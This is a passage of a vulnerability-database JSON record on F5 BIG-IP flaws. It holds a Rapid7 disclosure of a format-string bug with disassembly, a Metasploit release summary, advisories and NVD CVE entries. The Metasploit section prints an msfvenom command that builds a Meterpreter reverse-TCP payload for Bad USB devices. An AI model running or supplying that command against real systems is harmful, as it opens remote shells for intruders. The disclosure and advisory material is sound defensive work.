__ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*).text:0810CBFB pop eax.text:0810CBFC pop edx.text:0810CBFD lea eax, [ebp+var_8C8].text:0810CC03 lea edi, [ebp+format].text:0810CC09 push eax.text:0810CC0A push edi.text:0810CC0B call __ZNKSt15basic_stringbufIcSt11char_traitsIcESaIcEE3strEv ; std::basic_stringbuf<char,std::char_traits<char>,std::allocator<char>>::str(void)\n .text:0810CC0B ; } // starts at 810CBE6.text:0810CC10 pop eax.text:0810CC11 push dword ptr [ebp+format].text:0810CC17 push 6.text:0810CC19 ; try {.text:0810CC19 call _syslog ; <--- Vulnerable call to syslog().text:0810CC19 ; } // starts at 810CC19\n \n\nA `String` object (that contains `query:`) has the query string appended to it, then is passed directly into `_syslog()`, which processes format string characters.\n\n## Impact\n\nThe most likely impact of a successful attack is to crash the server process. A skilled attacker could potentially develop a remote code execution exploit, which would run code on the F5 BIG-IP device as the root user.\n\n## Remediation\n\nThere is currently no fix for this issue in released BIG-IP software versions. F5 has indicated that an engineering hotfix will be made available. It should be stressed that this issue is only exploitable as an authenticated user of the vulnerable device. So, end users should restrict access to the management port to only trusted individuals (and the linked KB provides a procedure to bind `webd` to localhost) which is usually good advice anyway.\n\n## Rapid7 customers\n\nAn authenticated vulnerability check for CVE-2023-22374 will be available in today's (Feb 1) content-only release. Because F5's [hotfix policy](<https://support.f5.com/csp/article/K4918>) is that hotfixes come with &quot;no warranty of guarantee of usability,&quot; please note that hotfixes are not taken into consideration for vulnerability checks within InsightVM.\n\n## Timeline\n\n * December, 2022 - Discovered the vulnerability\n * Tue, Dec 6, 2022 - Reported to F5 SIRT\n * Wed, Dec 7, 2022 - F5 forwarded to the F5 Product Engineering team for analysis\n * Thu, Dec 22, 2022 - F5 confirmed the issue and has started working on a fix\n * Wed, Jan 4, 2023 - Issue reported to CERT/CC (VRF#23-01-TVJZN)\n * Wed, Jan 18, 2023 - F5 provided a draft security advisory, CVSS scoring, and CVE-2023-22374 reservation\n * Wed, Feb 1, 2023 - This public disclosure and [F5's advisory](<https://my.f5.com/manage/s/article/K000130415>) published", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-02-01T15:57:57", "type": "rapid7blog", "title": "CVE-2023-22374: F5 BIG-IP Format String Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800", "CVE-2023-22374"], "modified": "2023-02-01T15:57:57", "id": "RAPID7BLOG:88C0DAFA91CD3F8C9F21B748E969AA2A", "href": "https://blog.rapid7.com/2023/02/01/cve-2023-22374-f5-big-ip-format-string-vulnerability/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-30T18:33:40", "description": "## F5 Big-IP\n\n\n\nThis week\u2019s Metasploit release contains 2 new modules released as part of the [Rapid7 F5 BIG-IP and iControl REST Vulnerabilities research article](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>).\n\nThese discoveries were made by our very own [Ron Bowes](<https://github.com/rbowes-r7>), who developed an [exploit module](<https://github.com/rapid7/metasploit-framework/pull/17273>) for authenticated RCE against F5 devices running in appliance mode to achieve a Meterpreter session as the root user.\n\n[Ron Bowes](<https://github.com/rbowes-r7>) has also developed an F5 [Metasploit module](<https://github.com/rapid7/metasploit-framework/pull/17271>) exploiting [CVE-2022-41622](<https://attackerkb.com/topics/i21EbdNxks/cve-2022-41622?referrer=blog>), a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below - which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the root user.\n\nFor more information, see [Rapid7\u2019s blog post](<https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/>) which detail the vulnerabilities.\n\n## DuckyScript support\n\nCommunity contributor [h00die](<https://github.com/h00die>) contributed an [enhancement](<https://github.com/rapid7/metasploit-framework/pull/17279>) to `msfvenom`. This adds the `ducky-script-psh` format to `msfvenom`:\n \n \n msfvenom -p windows/meterpreter/reverse_tcp -f ducky-script-psh lhost=127.0.0.1 lport=444\n \n\nThis allows users to create payloads that are compatible with Bad USB devices such as the Flipper Zero.\n\n## New module content (3)\n\n * [F5 BIG-IP iControl Authenticated RCE via RPM Creator](<https://github.com/rapid7/metasploit-framework/pull/17273>) by [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-41800](<https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800?referrer=blog>) \\- This adds an authenticated RCE for F5 devices that leverages the command injection flaw identified in [CVE-2022-41800](<https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800?referrer=blog>).\n * [F5 BIG-IP iControl CSRF File Write SOAP API](<https://github.com/rapid7/metasploit-framework/pull/17271>) by [Ron Bowes](<https://github.com/rbowes-r7>), which exploits [CVE-2022-41622](<https://attackerkb.com/topics/i21EbdNxks/cve-2022-41622?referrer=blog>) \\- This module exploits a CSRF vulnerability in F5 Big-IP versions 17.0.0.1 and below which leads to an arbitrary file overwrite as root. With this module, a user can choose to overwrite various system files to achieve a Meterpreter session as the `root` user.\n * [ChurchInfo 1.2.13-1.3.0 Authenticated RCE](<https://github.com/rapid7/metasploit-framework/pull/17257>) by m4lwhere, which exploits [CVE-2021-43258](<https://attackerkb.com/topics/ASbWdFdI4Q/cve-2021-43258?referrer=blog>) \\- A new module has been added for [CVE-2021-43258](<https://attackerkb.com/topics/ASbWdFdI4Q/cve-2021-43258?referrer=blog>) which exploits a flaw whereby, when emailing users in the ChurchInfo database with attachments, the uploaded file is hosted in a web accessible location under the ChurchInfo web root before the email is sent. An authenticated attacker can abuse this to gain RCE as the `www-user` user.\n\n## Enhancements and features (6)\n\n * [#17145](<https://github.com/rapid7/metasploit-framework/pull/17145>) from [k0pak4](<https://github.com/k0pak4>) \\- This PR adds the ability to authenticate via hash and improves the error reporting when authentication fails.\n * [#17279](<https://github.com/rapid7/metasploit-framework/pull/17279>) from [h00die](<https://github.com/h00die>) \\- This adds the `ducky-script-psh` format to msfvenom so it can create payloads that are compatible with Bad USB devices such as the Flipper Zero.\n * [#17283](<https://github.com/rapid7/metasploit-framework/pull/17283>) from [bcoles](<https://github.com/bcoles>) \\- Improves the `linux/gather/enum_psk` module, and adds documentation\n * [#17284](<https://github.com/rapid7/metasploit-framework/pull/17284>) from [bcoles](<https://github.com/bcoles>) \\- Updates `modules/post/linux/gather/enum_network` and `modules/post/linux/gather/tor_hiddenservices` to extract hostname details in a similar fashion to other modules\n * [#17285](<https://github.com/rapid7/metasploit-framework/pull/17285>) from [bcoles](<https://github.com/bcoles>) \\- Improves validation in `linux/gather/tor_hiddenservices` to ensure that the `locate` command is present before running the module\n * [#17296](<https://github.com/rapid7/metasploit-framework/pull/17296>) from [jmartin-r7](<https://github.com/jmartin-r7>) \\- Adds clarification to the module documentation that links to external resources are not controlled by project maintainers. These external resources may no longer exist and are subject to malicious takeover in the future. These links should be reviewed accordingly.\n\n## Bugs fixed (1)\n\n * [#17277](<https://github.com/rapid7/metasploit-framework/pull/17277>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes a crash within the python reverse http stager.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.2.27...6.2.28](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-11-17T05%3A52%3A06-06%3A00..2022-11-24T10%3A30%3A44%2B00%3A00%22>)\n * [Full diff 6.2.27...6.2.28](<https://github.com/rapid7/metasploit-framework/compare/6.2.27...6.2.28>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-11-25T17:14:15", "type": "rapid7blog", "title": "Metasploit Weekly Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-43258", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-25T17:14:15", "id": "RAPID7BLOG:B4E26DF19E173872B288BDE35B3248A5", "href": "https://blog.rapid7.com/2022/11/25/metasploit-weekly-wrap-up-185/", "cvss": {"score": 0.0, "vector": "NONE"}}], "attackerkb": [{"lastseen": "2023-01-20T20:06:52", "description": "** RESERVED ** This candidate has been reserved by an organization or individual that will use it when announcing a new security problem. When the candidate has been publicized, the details for this candidate will be provided.\n\n \n**Recent assessments:** \n \n**rbowes-r7** at November 16, 2022 10:34pm UTC reported:\n\nThis permits a user who already has an administrator account to create a shell on the target device. There are other (authorized) ways to do this, so this vulnerability is pretty minor, IMO, although if it IS exploited it grants access to a network load balancer which is kind of a big deal.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 1\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-20T00:00:00", "type": "attackerkb", "title": "CVE-2022-41800", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1388", "CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-01-20T00:00:00", "id": "AKB:EB86163A-D6FE-4561-8D2C-40CE96FB9F2F", "href": "https://attackerkb.com/topics/ZClTQn4aG4/cve-2022-41800", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2022-11-18T10:14:29", "description": "Threat Level Vulnerability Report For a detailed threat advisory, download the pdf file here Summary Two security flaws in F5 BIG-IP and BIG-IQ can be exploited to enable remote code execution. An adversary could get persistent root access to the device&#x27;s management interface by successfully exploiting the vulnerability (CVE-2022-41622), however this requires the attacker to know the address for a certain BIG-IP instance. Although the proof of concept is available, such an exploit requires an administrator with an active session visiting a rogue website.", "cvss3": {}, "published": "2022-11-18T08:42:14", "type": "hivepro", "title": "RCE flaw in F5 BIG-IP and BIG-IQ", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-11-18T08:42:14", "id": "HIVEPRO:97778E9F6B00532FECC982DB2002C416", "href": "https://www.hivepro.com/rce-flaw-in-f5-big-ip-and-big-iq/", "cvss": {"score": 0.0, "vector": "NONE"}}], "checkpoint_advisories": [{"lastseen": "2022-11-23T14:53:21", "description": "A cross-site request forgery vulnerability exists in F5 Big-IP. Successful exploitation of this vulnerability could result in code execution on the affected system.", "cvss3": {}, "published": "2022-11-23T00:00:00", "type": "checkpoint_advisories", "title": "F5 Big-IP Cross-Site Request Forgery (CVE-2022-41622)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-11-23T00:00:00", "id": "CPAI-2022-0927", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-23T14:53:15", "description": "A command injection vulnerability exists in F5 Big-IP. Successful exploitation of this vulnerability could allow a remote attacker to execute arbitrary commands on the affected system.", "cvss3": {}, "published": "2022-11-23T00:00:00", "type": "checkpoint_advisories", "title": "F5 Big-IP Command Injection (CVE-2022-41800)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-11-23T00:00:00", "id": "CPAI-2022-0928", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-02-09T14:44:24", "description": "In all versions, BIG-IP and BIG-IQ are vulnerable to cross-site request forgery (CSRF) attacks through iControl SOAP. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-12-07T04:15:00", "type": "cve", "title": "CVE-2022-41622", "cwe": ["CWE-352"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41622"], "modified": "2022-12-08T20:14:00", "cpe": ["cpe:/a:f5:big-ip_link_controller:16.1.3", "cpe:/a:f5:big-ip_fraud_protection_service:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:14.1.5", "cpe:/a:f5:big-ip_access_policy_manager:16.1.3", "cpe:/a:f5:big-ip_advanced_firewall_manager:16.1.3", "cpe:/a:f5:big-ip_domain_name_system:15.1.8", "cpe:/a:f5:big-ip_global_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:15.1.8", "cpe:/a:f5:big-ip_application_security_manager:16.1.3", "cpe:/a:f5:big-ip_application_acceleration_manager:15.1.8", "cpe:/a:f5:big-ip_local_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:14.1.5", "cpe:/a:f5:big-ip_analytics:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:16.1.3", "cpe:/a:f5:big-iq_centralized_management:8.2.0", "cpe:/a:f5:big-ip_local_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_analytics:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:14.1.5", "cpe:/a:f5:big-iq_centralized_management:7.1.0", "cpe:/a:f5:big-ip_domain_name_system:16.1.3", "cpe:/a:f5:big-ip_local_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:17.0.0", "cpe:/a:f5:big-ip_global_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_policy_enforcement_manager:13.1.5", "cpe:/a:f5:big-ip_application_security_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:14.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:13.1.5", "cpe:/a:f5:big-ip_domain_name_system:13.1.5", "cpe:/a:f5:big-ip_access_policy_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:17.0.0", "cpe:/a:f5:big-ip_link_controller:13.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:14.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:15.1.8", "cpe:/a:f5:big-ip_application_acceleration_manager:17.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:17.0.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:17.0.0", "cpe:/a:f5:big-ip_fraud_protection_service:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:13.1.5", "cpe:/a:f5:big-ip_analytics:17.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:14.1.5", "cpe:/a:f5:big-ip_advanced_firewall_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:15.1.8", "cpe:/a:f5:big-ip_link_controller:15.1.8", "cpe:/a:f5:big-ip_application_acceleration_manager:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:17.0.0", "cpe:/a:f5:big-ip_access_policy_manager:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:17.0.0"], "id": "CVE-2022-41622", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41622", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:f5:big-ip_fraud_protection_service:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:7.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_access_policy_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-iq_centralized_management:8.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:15.1.8:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:44:39", "description": "In all versions of BIG-IP, when running in Appliance mode, an authenticated user assigned the Administrator role may be able to bypass Appliance mode restrictions, utilizing an undisclosed iControl REST endpoint. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.", "cvss3": {"exploitabilityScore": 2.3, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 8.7, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.8}, "published": "2022-12-07T04:15:00", "type": "cve", "title": "CVE-2022-41800", "cwe": ["CWE-77"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-41800"], "modified": "2022-12-12T15:25:00", "cpe": ["cpe:/a:f5:big-ip_link_controller:16.1.3", "cpe:/a:f5:big-ip_fraud_protection_service:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:14.1.5", "cpe:/a:f5:big-ip_access_policy_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:15.1.8", "cpe:/a:f5:big-ip_analytics:15.1.8", "cpe:/a:f5:big-ip_application_security_manager:16.1.3", "cpe:/a:f5:big-ip_application_acceleration_manager:15.1.8", "cpe:/a:f5:big-ip_local_traffic_manager:15.1.8", "cpe:/a:f5:big-ip_analytics:14.1.5", "cpe:/a:f5:big-ip_analytics:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:16.1.3", "cpe:/a:f5:big-ip_local_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_analytics:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:13.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_application_security_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:14.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:13.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:13.1.5", "cpe:/a:f5:big-ip_domain_name_system:13.1.5", "cpe:/a:f5:big-ip_access_policy_manager:13.1.5", "cpe:/a:f5:big-ip_link_controller:17.0.0", "cpe:/a:f5:big-ip_link_controller:13.1.5", "cpe:/a:f5:big-ip_global_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_domain_name_system:14.1.5", "cpe:/a:f5:big-ip_application_acceleration_manager:17.0.0", "cpe:/a:f5:big-ip_local_traffic_manager:16.1.3", "cpe:/a:f5:big-ip_global_traffic_manager:14.1.5", "cpe:/a:f5:big-ip_local_traffic_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:15.1.8", "cpe:/a:f5:big-ip_domain_name_system:17.0.0", "cpe:/a:f5:big-ip_advanced_firewall_manager:17.0.0", "cpe:/a:f5:big-ip_fraud_protection_service:14.1.5", "cpe:/a:f5:big-ip_fraud_protection_service:13.1.5", "cpe:/a:f5:big-ip_analytics:17.0.0", "cpe:/a:f5:big-ip_policy_enforcement_manager:14.1.5", "cpe:/a:f5:big-ip_policy_enforcement_manager:15.1.8", "cpe:/a:f5:big-ip_link_controller:15.1.8", "cpe:/a:f5:big-ip_application_acceleration_manager:16.1.3", "cpe:/a:f5:big-ip_access_policy_manager:17.0.0", "cpe:/a:f5:big-ip_access_policy_manager:15.1.8", "cpe:/a:f5:big-ip_policy_enforcement_manager:17.0.0", "cpe:/a:f5:big-ip_application_security_manager:17.0.0"], "id": "CVE-2022-41800", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-41800", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:f5:big-ip_fraud_protection_service:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_advanced_firewall_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_security_manager:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_global_traffic_manager:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:15.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_application_acceleration_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_local_traffic_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:14.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_domain_name_system:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:13.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_analytics:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:16.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_link_controller:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_policy_enforcement_manager:17.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:f5:big-ip_fraud_protection_service:14.1.5:*:*:*:*:*:*:*", 